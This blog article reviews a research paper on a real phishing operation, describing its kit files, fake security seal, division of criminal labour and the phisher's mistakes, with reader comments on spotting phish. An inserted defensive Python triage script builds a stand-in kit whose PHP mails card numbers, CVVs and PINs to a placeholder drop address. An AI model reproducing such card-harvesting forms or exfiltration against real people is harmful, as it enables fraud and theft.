
The anatomy of a phishing operation

There are far better things than being phished, like writing about how not to get phished. Michael P. Kassner reviews a research paper that provides amazing insight into a successful phishing operation.

In the spring of 2009, I became someone's phishee. You'd think a person who writes about IT security would know better. But I didn't. Of all the emotions I felt, embarrassment was by far the worst. Especially since, only days earlier, I penned the article, "Phishing: Is that website real or not?"

While in my "poor me" funk, I happened to remember a well-worn cliché, and decided I might as well make the proverbial lemonade instead of sulking. Or better yet, ask the experts how to avoid digital con artists like the one I bumped into, and then write about it.

To that end, I'd like you to meet someone I wish I'd known back then. His name is John Brozycki. He understands phishing, every sordid detail; his credentials: a bucket full of GIAC certifications, years of experience, and a willingness to share what he knows.

Ironically, right around the time I was phished, John was writing "Inside a Phish," a paper about one particular phisher, his escapades, and eventual take-down by authorities. It is one of the best commentaries I've read on the inner workings of a successful phishing operation.

What makes this paper valuable is John's ability to piece together the details of how a phishing attack was carried out, using information from both the phisher and the phishee:

I had often wished I could be a "fly on the wall" and see how a phish operated, understanding that it wouldn't represent all phishers any more than watching one bank heist would represent all bank robbers. Regardless, I knew there could be a lot of information in the emails, and I found myself immediately asking if I could study the data.

It took a while, several years in fact, before John finally obtained permission to look at the case records involved in the investigation:

I was told I couldn't while it was an active investigation. After a few years, my periodic requests finally got a positive response. I learned I could come in to review the data, agreeing not to use details such as names, IP addresses, and organizations. I wanted to study the methods and workings of the phish.

John also explained why it was important to audit the involved financial institution:

As I started reviewing the information, I also began thinking about the financial institution this phish was perpetrated against. What were they doing and how were they reacting while the phish was in play? What was done effectively and what could have been done better?

An example

Before we get to the details of John's investigation, I thought it would be best to explain the rudiments of phishing. A phish consists of two basic components: requests and responses.

Request: The intended victim receives an email (see "The anatomy of a scam email message"), supposedly from an organization (usually financial) that the victim belongs to, carrying a request composed with one thing in mind: get the victim to respond. The following slide is an example of such a request (both slides courtesy of Cadzow.com).

Response: The victim decides whether to click on the link in the email or not. If the victim clicks the link, the following phishing webpage opens displaying yet another request.

As you can see, the phisher is attempting to obtain sensitive financial information. And if the victim responds, the phisher wins. According to my source (unverified), this phishing campaign fooled more than a few Citibank members. Now let's see what John's investigation turned up.

Phishing kits

As part of the agreement with law enforcement, John promised not to reveal any discernible information; so meet Bob -- the nasty phisher -- and GIAC Bank -- the copycatted financial institution. By agreeing, John was able to look at the phishing kit and email conversations Bob had with other operatives.

For those not familiar with phishing kits, a kit is an archive of all the files required to build the phishing website. John explains why dissecting one is helpful:

When you can get it [phishing kit], it can provide a wealth of information. Opening the kit and reviewing the source code from the PHP scripts, I found the email address where the phished data was being sent.

I thought it might be interesting to look at a few of the files John found in the GIAC Bank phishing kit:

  • Config.php configures the hosting URL, the phisher's blind-drop email address where account information is to be sent, and the name of the financial institution being targeted.
  • Index.php creates the front page asking for logon information. After entering the appropriate information and clicking on the submit button, the data is posted to Login.php.
  • Login.php sets up the web form that requests the following: card number, expiration date, cvv2 (number printed on the card's backside), and PIN.

A fake website similar enough to fool a majority of people, asking for sensitive financial account information -- what's not to like? To make it even more official looking, Bob made sure the phishing website gave the impression of having the correct digital certificates.

The GIAC Bank displays a Secured by Verisign image on the bank's webpages. Bob requested the element also be on the phishing website -- no small task as John explains:

GIAC Bank uses Verisign for the site's digital certificate, and runs an element on its page provided by Verisign to help assure visitors that the page they are viewing is both authentic and secure. The phish has substituted an Adobe Shockwave file with an animation that mimics the real Verisign element (Figure 11). This is a clever touch. Even nicer, this animation is made from vector graphics, not an image capture from the real logo.

Email logs

While the investigation was going on, John helped law enforcement decipher the email logs, but was not privy to the actual emails for several years (remember John had to wait until the investigation ended). Just from viewing the logs, John was convinced the actual emails would provide an immense amount of operational information.

Once the authorities gave John access to the emails, he learned something interesting. Bob did very little of the actual work; he was a coordinator, running multiple phishing operations, each targeting five different financial institutions. The jobs Bob parceled out were:

  • Reconnaissance: identifying potential victims and which financial institutions they were associated with, an important first step.
  • Target lists: compiling address lists of victims who used the same financial institutions.
  • Mail delivery: sending the phishing emails to each of the potential victims.
  • Web-server compromise: taking over servers so phishing kits could be installed without the owner's knowledge.
  • Phish-kit creation and modification: critical to afford the best chance of fooling victims.
  • Monetization: turning compromised card accounts into payment for Bob and all the third-party operators involved.

This should give you an idea what's required to run a successful phishing operation, and the depth phishers will go to when there's money to be made.

What Bob did wrong

According to John, Bob made several mistakes. First, he did not delete the phishing kit from the compromised web servers, which allowed authorities to warn the targeted financial institutions and blunt most of the attack's effect. Second, Bob kept a log of the victims on the web server; that list gave authorities the chance to warn many of the victims soon enough to prevent their accounts from being compromised.
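The kit files listed under "Phishing kits" (Config.php, Index.php, Login.php) and the two things Bob left behind on the compromised servers (the kit itself and the victim log) are exactly what an incident responder gets to triage. The Python below is an added example, not code from this article or from John's paper. It builds a constructed stand-in kit in a temporary directory (made-up addresses, hostname, institution name and two published test card numbers; all file names, variable names and values are assumptions), then sweeps it the way John describes: pulling the blind-drop address, hosting URL and target institution name out of the PHP, flagging mail() calls and forms that collect card data, and recognizing a victim log by Luhn-valid card numbers rather than by any run of digits, so an order number in a notes file is not misreported as victim data.

```python
"""Triage of a recovered phishing kit (added example; constructed data)."""
import os
import re
import tempfile

# Constructed stand-in for the kit files described in the article.  The PHP is
# reduced to the declarations that matter for triage; nothing here is real.
SAMPLE_FILES = {
    "config.php": (
        "<?php\n"
        '$site_url = "http://compromised-host.example/giac/";\n'
        '$drop_email = "collector@mailbox.example";  // blind-drop mailbox\n'
        '$bank_name = "GIAC Bank";\n'
    ),
    "index.php": (
        "<?php include('config.php'); ?>\n"
        '<form method="post" action="login.php">\n'
        '<input name="username"> <input name="password" type="password">\n'
        "</form>\n"
    ),
    "login.php": (
        "<?php include('config.php'); ?>\n"
        '<form method="post" action="login.php">\n'
        '<input name="card"> <input name="exp"> <input name="cvv2"> <input name="pin">\n'
        "</form>\n"
        "<?php mail($drop_email, $bank_name, $entry); ?>\n"
    ),
    # Victim log left on the server: two Luhn-valid industry test card numbers.
    "result.txt": "4111111111111111|12/14|123|4321\n4012888888881881|01/15|987|1111\n",
    # Distractor: a 16-digit order number that is not Luhn-valid.
    "notes.txt": "order 1234567890123456 shipped\n",
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL_RE = re.compile(r"https?://[^\s\"']+")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*[\"']([^\"']*)[\"']")      # $var = "..."
ACTION_RE = re.compile(r"action\s*=\s*[\"']([^\"']+)[\"']", re.I)  # form targets
FIELD_RE = re.compile(r"<input[^>]*\bname\s*=\s*[\"']([^\"']+)[\"']", re.I)
SENSITIVE_RE = re.compile(r"card|cvv|pin|exp|pass|ssn|account|routing", re.I)
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
DIGITS_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_ok(number: str) -> bool:
    """Luhn check, so only plausible card numbers count as victim data."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def triage_kit(root: str) -> dict:
    """Sweep a kit directory and return the indicators a responder wants first."""
    report = {
        "drop_addresses": set(),    # where the phished data is mailed
        "hosting_urls": set(),      # hosting URL from the config
        "config_strings": {},       # every quoted assignment, e.g. bank_name
        "post_targets": set(),      # form action= targets (index.php -> login.php)
        "sensitive_fields": set(),  # form fields collecting card/PIN data
        "mail_calls": [],           # scripts that call mail()
        "victim_logs": {},          # file -> count of Luhn-valid card numbers
    }
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name.lower().endswith((".php", ".html", ".htm")):
                report["drop_addresses"].update(EMAIL_RE.findall(text))
                report["hosting_urls"].update(URL_RE.findall(text))
                report["config_strings"].update(ASSIGN_RE.findall(text))
                report["post_targets"].update(ACTION_RE.findall(text))
                report["sensitive_fields"].update(
                    f for f in FIELD_RE.findall(text) if SENSITIVE_RE.search(f))
                if MAIL_CALL_RE.search(text):
                    report["mail_calls"].append(rel)
            else:
                pans = [n for n in DIGITS_RE.findall(text) if luhn_ok(n)]
                if pans:
                    report["victim_logs"][rel] = len(pans)
    return report


def write_sample_kit(root: str) -> None:
    """Materialize the constructed kit so the sweep runs on real files."""
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)


def triage_sample() -> dict:
    """Build the constructed kit in a temp directory and triage it."""
    with tempfile.TemporaryDirectory() as root:
        write_sample_kit(root)
        return triage_kit(root)


if __name__ == "__main__":
    for key, value in triage_sample().items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Run it as a script to see the report; on a real kit, point triage_kit() at the unpacked directory. The Luhn filter is the part worth keeping: victim logs are usually plain text with no fixed layout, and matching on digit runs alone produces noise from order numbers, timestamps and session IDs.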

Final thoughts

A couple of things stand out in my mind. Experts comment on how criminals run their operations in a business-like manner, and that appears to be true in Bob's case. There is a point of departure though -- financing; handling money appears to be a bit more creative than what I'm used to. Several times, John pointed out, if Bob needed anything -- personal or for his operation -- he would simply use stolen bankcards. That's one way of eliminating risk-averse investments.

This article was a complex piece to pull together; I can imagine the effort John went through during his years of research. That's why I want to extend my heartfelt thanks to John, and SANS as well, for allowing me to use parts of John's paper in this article.

I have been steadily reporting on phishing since 2009, and many of the articles are still relevant. If you are interested, they can be found here.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

28 comments
ProfQuill

A pretty good clue that an email IS legitimate is if it includes your actual name (even first name should be enough), or something like the last 4 digits of your account number, pieces of data that a phisher wouldn't have. I agree with another poster that institutions should make their fraud reporting email address more prominent; I've had to dig pretty deep on some sites. Many tend to use 'abuse@bank.com', but not all; my suggestion is that EVERY site accept such an address. I have to chuckle at the Nigerian scams alleging an inheritance to someone 'with the same surname as yours', but of course they don't say what that name is. Obviously, they have no clue and it's a mass mailing anyway. Point emphasized: institutions should make it policy that their emails include a tidbit of personal info that a scammer wouldn't know. So if you know your institution does that and you get email without it, then you can treat that with high suspicion. I guess there's some danger a scammer could intercept legitimate email and gather that info; seems like a real stretch though.

TRgscratch

1 - As I have told my mother many times: don't ever type in anything anywhere that it seems like they should know ("please enter your username"); or, never type in anything, anywhere, especially stuff they shouldn't know ("enter your PIN").
1a - If it's legitimate, they will make more effort to contact you.
2 - Why don't all institutions make their "send us any phony-looking emails here" address more prominent on their web sites? Don't they want to know that someone out there is screwing with their customers? I got what I thought might be a phishing email from a well-known vendor, and could not find the 'send abuse to' email address anywhere on their web site. I finally found it in a blog.
Having said all that, I sent a phony-looking email to a vendor, only to get a reply from them that it was legit, and apologising (and, yes, I understand that the apology could have been phishing, but it didn't ask for anything).

captainanalog

I don't know about my credit cards, but eBay and Paypal have a nice anti-phishing feature. If you get suspicious email 'from' them you can forward it to spoof@ebay.com. Chances are they will confirm that the mail is a phishing expedition and they will investigate.

UIS

Protection and Prevention II – Scams, Robberies and Assaults Are Avoidable 1 / 2 http://goo.gl/vIlDI Protection and Prevention II – Scams, Robberies and Other Assaults Are Avoidable (cont.) 2 / 2 http://goo.gl/bDF5V Protection and Prevention IIIa – Political or Social Predators. http://goo.gl/d15nP Protection and Prevention IIIb – Patterns of Behaviour of Social Predators. http://goo.gl/HZng8

mcs

Your article is good and makes interesting reading for everyone. I have been observing that most people are very eager to prove they are more intelligent than crooks and start pointing out what mistakes they did. Was that the objective of this article? Are not we helping other unknown crooks by educating them what mistakes they should not do? Why mention what mistakes they did? Instead, we must concentrate on what a user must observe and do or not do to avoid such pitfalls and save them instead of helping crooks to be better and better by exposing methods used as well as mistakes to be avoided.

horace14

It is striking how the phishing operation follows the structure of a "big con", as detailed in "The Big Con" by David Maurer (1940), describing the operations of confidence men in the early 20th century. Many "ropers" collect potential victims (marks), who are played by the "inside man" in the "shop". In the phishing operation described, the "inside man" creates the website (the "shop") and probably crafts the emails. The "ropers" discover the email addresses and supporting details and send the emails. As noted, there is also a support function to "monetise" the information collected. The different layers work together to maximise the value (of the inside man's skills) and minimise the risk for everyone involved.

Pats3

Would happen less if people would go directly to the financial institution that supposedly is asking for that info. They tell us time and time again "we do not ask for personal info in an e-mail". Not a difficult thing to do - don't be lazy about your own safety.

skootert221

Common sense is always key in these situations. Unfortunately, that is difficult to learn and apply these days. Educating people proactively is the only way to really have the edge on phishing and other scams.

wizard57m-cnet

these types of phish attempts would not result in anything for the perpetrator. 1. Very, very few, if any, internet-enabled financial institutions, nor even most service providers with an internet/web presence, will request a user's email address without some prior contact. If you doubt the validity, do not respond to the email you received; instead initiate contact with the provider at their official website or via telephone. 2. Of all the phishing attempt emails I have seen, all of them contain various errors, either spelling, grammar or other. If the email contains errors, it is probably not official. Verify via official contact means. One final thought: if you have NEVER given your email address to some entity, then HOW could they possibly be needing to "confirm" your address, especially with your financial card information?

JCitizen

The spammers/phishers have vast databases for such things - I doubt mine was a spear phish - all they have to do is sniff the packets of email and match it to an address, and they can get your real name. If email were SSL all the way like it should be, this wouldn't be as likely to happen. Plus, once a vendor is compromised, which is what I believe happened in my case, the customer databases can be harvested and phish email sent to all of them. It is not hard to guess that all have PayPal accounts or they wouldn't have been a customer of the vendor that got cracked. I remember reading in the news of several of my vendors getting compromised not long before my phish mail arrived. I'm sure that is where they got their data.

Michael Kassner

Is excellent. I intend to use that in my explanations from now on.

SimonHobson

PayPal are one of the offenders who send out emails with instructions like "Click here and review your transactions". If the institution is training users to click links in emails, then what hope do we have? I've also been on the end of phone calls which start with "I need some security information from you" - needless to say I refused and complained to the bank, who didn't seem to see it as a problem!

Michael Kassner

And thank Google Translate. That was interesting reading, and a viewpoint I had not considered.

Michael Kassner

Hindsight has a way of making us look more intelligent, but history will prove bad guys to be proactive, whereas the good guys are for the most part reactive, a step or two behind if you will.

Michael Kassner

I did not make that connection, but I sure do now. I remember it was hard to believe it was nonfiction. The connection I made was with the movie "The Sting." Actually, I now remember reading that Maurer's book probably precipitated "The Sting."

JCitizen

of any phrase in the email will always provide hits too - not that a person should try to follow any email link anyway if no frauds are found.

Michael Kassner

Now there is no asking for information in the email. All they ask is for you to click on the link, bringing you to the supposed website. More or less what the real banks are doing.

Michael Kassner

I see the trick is taking that extra second to think about it before clicking. Rushing is where mistakes are made.

JCitizen

On number 1 - I have been stupidly contacted by several critical institutions just the way you say they shouldn't - I found their contact numbers in an outside search and called them to see what was up and was surprised to find they actually sent the emails!!! Now my next move was to roundly criticize them for doing that and explain why. Most of the time they take this very well and promise to contact a team leader to look into the matter. On number 2 - I had one perfect phishing email once, but even on the ones that are not perfect, the criminals are very good at copying the ambiance of the institution that is supposedly sending the email. This could take an otherwise aware individual by surprise, because so many institutions are crazy about constantly changing their content, both in their emails and their web-facing site pages. This breeds confusion for the average user, and even makes my head spin sometimes. ?:| In fact, sometimes the legit email gets blocked by the email content filter for too many changes to server address naming conventions, suspicious content, or outright domain changes at a dizzying pace. Follow-up indeed proves that they were previously approved sources!! :O

Michael Kassner

In this case, email addresses weren't requested, Bob knew them to begin with. Bob also knew which bank they used. I wasn't privy to any of the evidence, but I get the impression that the email and website were quite good. Would have to be if you even include an animated Verisign logo.

Michael Kassner

Has PayPal been doing that recently? Several years ago, I received email similar to that, but not for quite a while.

JCitizen

I was chumped by a VERY convincing PayPal phishing email once, and I got all the way to the login page before realizing what I'd done! Fortunately LastPass was dead, so that was my first indication I was at the wrong URL. This was a while back, but I don't remember any of the email page features being blocked, which is the first and foremost indication that the email is suspicious. Only approved emails are fully functional with applets and images intact. However - this crook was smart; he only used the minimum HTML coding, and there were almost no active images or other active links on the page. He was clever and used the illustrations without putting content with them, so the filter didn't catch it. However, Hotmail may have asked if I approved active content from this source when I clicked the hyperlink, and I may have dismissed it because I fell head over heels for the visual clues. I know everyone will criticize me for using HTML email, but I like to trip the minefields just like my clients do; and right now my honeypot only works well with email spam for sources of malware, so I naturally encourage full content. I am more careful now, and always check the headers when any content is blocked, and if I'm not running the honeypot, I go to my institutions outside of email links and never use them, of course. If I'm not sure about a header I send it to the target institution's phishing division for analysis, to see how the process goes. Four out of five emails are found to be phishing attacks this way. Hotmail has become better and better at blocking phishing email, and I always mark suspicious ones as phishing scams when I get them. Almost all of them are text now, with no illustrations, usually with just one link and no attachments. They are all obvious scams though, and a really good fooler hasn't made it past the filter on my accounts in a long time.
